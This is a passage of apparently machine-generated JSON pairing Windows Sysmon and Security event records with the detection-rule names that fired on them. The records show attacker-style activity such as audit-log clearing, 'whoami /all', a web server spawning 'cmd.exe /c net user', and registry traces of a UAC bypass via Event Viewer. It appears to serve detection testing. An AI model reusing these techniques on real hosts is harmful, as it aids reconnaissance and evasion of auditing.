23:06:02.878"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":415268,"Execution":{"#attributes":{"ProcessID":3336,"ThreadID":4516}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-13T23:06:02.889886Z"}},"Version":2}}}},{"detection":["(Built-in Logic) - Security audit log was cleared"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"System":{"Channel":"Security","Computer":"PC01.example.corp","Correlation":null,"EventID":1102,"EventRecordID":433307,"Execution":{"#attributes":{"ProcessID":856,"ThreadID":1660}},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"}},"Security":null,"Task":104,"TimeCreated":{"#attributes":{"SystemTime":"2019-03-18T11:27:00.438449Z"}},"Version":0},"UserData":{"LogFileCleared":{"#attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog","xmlns:auto-ns3":"http://schemas.microsoft.com/win/2004/08/events"},"SubjectDomainName":"EXAMPLE","SubjectLogonId":"0x18a7875","SubjectUserName":"user01","SubjectUserSid":"S-1-5-21-1587066498-1489273250-1035260531-1106"}}}}},{"detection":["Suspicious Svchost Process","Windows Processes Suspicious Parent Directory"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Host Process for Windows Services","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69","Image":"C:\\Windows\\System32\\svchost.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-82AE-607F-0000-0020E7030000","LogonId":"0x3e7","OriginalFileName":"svchost.exe","ParentCommandLine":"?","ParentImage":"?","ParentProcessGuid":"00000000-0000-0000-0000-000000000000","ParentProcessId":612,"ProcessGuid":"747F3D96-3A89-607F-0000-001028587700","ProcessId":4912,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2021-04-20 20:33:13.680"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":578503,"Execution":{"#attributes":{"ProcessID":3392,"ThreadID":4112}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2021-04-20T20:33:13.741579Z"}},"Version":5}}}},{"detection":["Suspicious Svchost Process","Windows Processes Suspicious Parent Directory"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"C:\\Windows\\system32\\svchost.exe -k LocalService -p -s fdPHost","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Host Process for Windows Services","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69","Image":"C:\\Windows\\System32\\svchost.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-82AF-607F-0000-0020E5030000","LogonId":"0x3e5","OriginalFileName":"svchost.exe","ParentCommandLine":"?","ParentImage":"?","ParentProcessGuid":"00000000-0000-0000-0000-000000000000","ParentProcessId":612,"ProcessGuid":"747F3D96-3A8A-607F-0000-0010E4717700","ProcessId":5280,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\LOCAL SERVICE","UtcTime":"2021-04-20 20:33:14.246"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":578505,"Execution":{"#attributes":{"ProcessID":3392,"ThreadID":4112}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2021-04-20T20:33:14.273416Z"}},"Version":5}}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"rundll32 url.dll,FileProtocolHandler ms-browser://","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows host process (Rundll32)","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-2842-5E1E-0000-0020FF3A7A00","LogonId":"0x7a3aff","OriginalFileName":"RUNDLL32.EXE","ParentCommandLine":"C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding","ParentImage":"C:\\Windows\\System32\\wbem\\WmiPrvSE.exe","ParentProcessGuid":"747F3D96-2842-5E1E-0000-0010903C7A00","ParentProcessId":1628,"ProcessGuid":"747F3D96-2842-5E1E-0000-00100C417A00","ProcessId":4180,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-01-14 20:44:50.348"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":336,"Execution":{"#attributes":{"ProcessID":1840,"ThreadID":8032}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2020-01-14T20:44:50.353148Z"}},"Version":5}}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"rundll32 url.dll,OpenURL ms-browser://","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows host process (Rundll32)","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-28B3-5E1E-0000-002057EB7B00","LogonId":"0x7beb57","OriginalFileName":"RUNDLL32.EXE","ParentCommandLine":"C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding","ParentImage":"C:\\Windows\\System32\\wbem\\WmiPrvSE.exe","ParentProcessGuid":"747F3D96-28B3-5E1E-0000-0010CAEC7B00","ParentProcessId":1632,"ProcessGuid":"747F3D96-28B3-5E1E-0000-00101DF17B00","ProcessId":3412,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-01-14 20:46:43.232"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":340,"Execution":{"#attributes":{"ProcessID":1840,"ThreadID":8032}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2020-01-14T20:46:43.237922Z"}},"Version":5}}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\whoami.exe\" /all","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Documents\\","Description":"whoami - displays logged on user information","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-5B3A-5CC7-0000-002096080100","LogonId":"0x10896","ParentCommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -s -NoLogo -NoProfile","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"365ABB72-65A9-5CC7-0000-00104E5C2400","ParentProcessId":3376,"ProcessGuid":"365ABB72-65AA-5CC7-0000-00104D882400","ProcessId":2116,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-04-29 20:59:22.128"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":8050,"Execution":{"#attributes":{"ProcessID":1896,"ThreadID":1820}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-04-29T20:59:22.144046Z"}},"Version":5}}}},{"detection":["(Built-in Logic) - Security audit log was cleared"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"System":{"Channel":"Security","Computer":"PC01.example.corp","Correlation":null,"EventID":1102,"EventRecordID":432901,"Execution":{"#attributes":{"ProcessID":856,"ThreadID":2200}},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"}},"Security":null,"Task":104,"TimeCreated":{"#attributes":{"SystemTime":"2019-03-18T11:06:25.485214Z"}},"Version":0},"UserData":{"LogFileCleared":{"#attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog","xmlns:auto-ns3":"http://schemas.microsoft.com/win/2004/08/events"},"SubjectDomainName":"EXAMPLE","SubjectLogonId":"0x18a7875","SubjectUserName":"user01","SubjectUserSid":"S-1-5-21-1587066498-1489273250-1035260531-1106"}}}}},{"detection":["MSHTA Spwaned by SVCHOST"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"C:\\Windows\\System32\\mshta.exe -Embedding","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Microsoft (R) HTML Application host","FileVersion":"11.00.9600.16428 (winblue_gdr.131013-1700)","Hashes":"SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A","Image":"C:\\Windows\\System32\\mshta.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-19E0-5CDA-0000-0020CE701000","LogonId":"0x1070ce","ParentCommandLine":"C:\\Windows\\system32\\svchost.exe -k DcomLaunch","ParentImage":"C:\\Windows\\System32\\svchost.exe","ParentProcessGuid":"365ABB72-965E-5CDA-0000-0010AF760000","ParentProcessId":596,"ProcessGuid":"365ABB72-19E0-5CDA-0000-001006711000","ProcessId":1932,"Product":"Internet Explorer","RuleName":"","TerminalSessionId":0,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-14 01:29:04.293"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":17589,"Execution":{"#attributes":{"ProcessID":2000,"ThreadID":1960}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-14T01:29:04.306885Z"}},"Version":5}}}},{"detection":["Shells Spawned by Web Servers"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"c:\\windows\\system32\\cmd.exe\" /c net user","Company":"Microsoft Corporation","CurrentDirectory":"c:\\windows\\system32\\inetsrv\\","Description":"Windows Command Processor","FileVersion":"6.1.7601.17514 (win7sp1_rtm.101119-1850)","Hashes":"SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-45C7-5CE7-0000-002092F99C00","LogonId":"0x9cf992","ParentCommandLine":"c:\\windows\\system32\\inetsrv\\w3wp.exe -ap \"DefaultAppPool\" -v \"v2.0\" -l \"webengine4.dll\" -a \\\\.\\pipe\\iisipm719e5ea8-b97b-40d0-96b6-44cca91790fe -h \"C:\\inetpub\\temp\\apppools\\DefaultAppPool\\DefaultAppPool.config\" -w \"\" -m 0 -t 20","ParentImage":"C:\\Windows\\System32\\inetsrv\\w3wp.exe","ParentProcessGuid":"365ABB72-49D6-5CE7-0000-001020A7A700","ParentProcessId":2580,"ProcessGuid":"365ABB72-4A01-5CE7-0000-0010EE9DAC00","ProcessId":2404,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"IIS APPPOOL\\DefaultAppPool","UtcTime":"2019-05-24 01:33:53.112"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":1044,"Execution":{"#attributes":{"ProcessID":2032,"ThreadID":2092}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-24T01:33:53.112486Z"}},"Version":5}}}},{"detection":["Net.exe Execution","Local Accounts Discovery"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"net user","Company":"Microsoft Corporation","CurrentDirectory":"c:\\windows\\system32\\inetsrv\\","Description":"Net Command","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=9A544E2094273741AA2D3E7EA0AF303AF2B587EA,MD5=B9A4DAC2192FD78CDA097BFA79F6E7B2,SHA256=D468E6B1B79555AC8BCE0300942FD479689EB8F159F3A399848D3BF9B9990A56,IMPHASH=B1F584304D1C7F2899A954905D8318C7","Image":"C:\\Windows\\System32\\net.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-45C7-5CE7-0000-002092F99C00","LogonId":"0x9cf992","ParentCommandLine":"\"c:\\windows\\system32\\cmd.exe\" /c net user","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-4A01-5CE7-0000-0010EE9DAC00","ParentProcessId":2404,"ProcessGuid":"365ABB72-4A01-5CE7-0000-00102DA1AC00","ProcessId":788,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"IIS APPPOOL\\DefaultAppPool","UtcTime":"2019-05-24 01:33:53.152"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":1046,"Execution":{"#attributes":{"ProcessID":2032,"ThreadID":2092}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-24T01:33:53.182587Z"}},"Version":5}}}},{"detection":["Net.exe Execution","Local Accounts Discovery"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"C:\\Windows\\system32\\net1 user","Company":"Microsoft Corporation","CurrentDirectory":"c:\\windows\\system32\\inetsrv\\","Description":"Net Command","FileVersion":"6.1.7601.17514 (win7sp1_rtm.101119-1850)","Hashes":"SHA1=387577C0B3B89FEFCE983DC42CFF456A33287035,MD5=2041012726EF7C95ED51C15C56545A7F,SHA256=A0BE13AC9443ACC6D2EEA474CC82A727BDB7E1009F573DBA34D269F9A6AAA347,IMPHASH=FB687F4F7ACC1F20B5382A2C932A259E","Image":"C:\\Windows\\System32\\net1.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-45C7-5CE7-0000-002092F99C00","LogonId":"0x9cf992","ParentCommandLine":"net user","ParentImage":"C:\\Windows\\System32\\net.exe","ParentProcessGuid":"365ABB72-4A01-5CE7-0000-00102DA1AC00","ParentProcessId":788,"ProcessGuid":"365ABB72-4A01-5CE7-0000-0010B6A2AC00","ProcessId":712,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"IIS APPPOOL\\DefaultAppPool","UtcTime":"2019-05-24 01:33:53.162"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":1047,"Execution":{"#attributes":{"ProcessID":2032,"ThreadID":2092}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-24T01:33:53.192601Z"}},"Version":5}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"c:\\windows\\system32\\notepad.exe\\1","EventType":"SetValue","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-86FC-5F07-0000-00101E4B0700","ProcessId":2356,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\\a","UtcTime":"2020-07-09 22:00:17.579"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":311354,"Execution":{"#attributes":{"ProcessID":3280,"ThreadID":1044}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-07-09T22:00:17.591137Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"a","EventType":"SetValue","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-86FC-5F07-0000-00101E4B0700","ProcessId":2356,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\\MRUList","UtcTime":"2020-07-09 22:00:17.579"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":311355,"Execution":{"#attributes":{"ProcessID":3280,"ThreadID":1044}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-07-09T22:00:17.591169Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"a","EventType":"SetValue","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-86FC-5F07-0000-00101E4B0700","ProcessId":2356,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\\MRUList","UtcTime":"2020-07-09 22:00:31.172"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":311361,"Execution":{"#attributes":{"ProcessID":3280,"ThreadID":1044}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-07-09T22:00:31.218022Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"cmd.exe\\1","EventType":"SetValue","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-86FC-5F07-0000-00101E4B0700","ProcessId":2356,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\\b","UtcTime":"2020-07-09 22:00:45.579"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":311367,"Execution":{"#attributes":{"ProcessID":3280,"ThreadID":1044}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-07-09T22:00:45.590589Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"ba","EventType":"SetValue","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-86FC-5F07-0000-00101E4B0700","ProcessId":2356,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\\MRUList","UtcTime":"2020-07-09 22:00:45.579"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":311368,"Execution":{"#attributes":{"ProcessID":3280,"ThreadID":1044}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-07-09T22:00:45.590736Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"powershell.exe\\1","EventType":"SetValue","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-86FC-5F07-0000-00101E4B0700","ProcessId":2356,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\\c","UtcTime":"2020-07-09 22:01:03.893"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":311375,"Execution":{"#attributes":{"ProcessID":3280,"ThreadID":1044}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-07-09T22:01:03.900433Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"cba","EventType":"SetValue","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-86FC-5F07-0000-00101E4B0700","ProcessId":2356,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\\MRUList","UtcTime":"2020-07-09 22:01:03.893"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":311376,"Execution":{"#attributes":{"ProcessID":3280,"ThreadID":1044}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-07-09T22:01:03.902259Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"eventvwr\\1","EventType":"SetValue","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-94CF-5F07-0000-0010BD590400","ProcessId":3248,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\\d","UtcTime":"2020-07-09 22:06:20.180"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":311387,"Execution":{"#attributes":{"ProcessID":3148,"ThreadID":4088}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-07-09T22:06:20.185045Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"dcba","EventType":"SetValue","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-94CF-5F07-0000-0010BD590400","ProcessId":3248,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\\MRUList","UtcTime":"2020-07-09 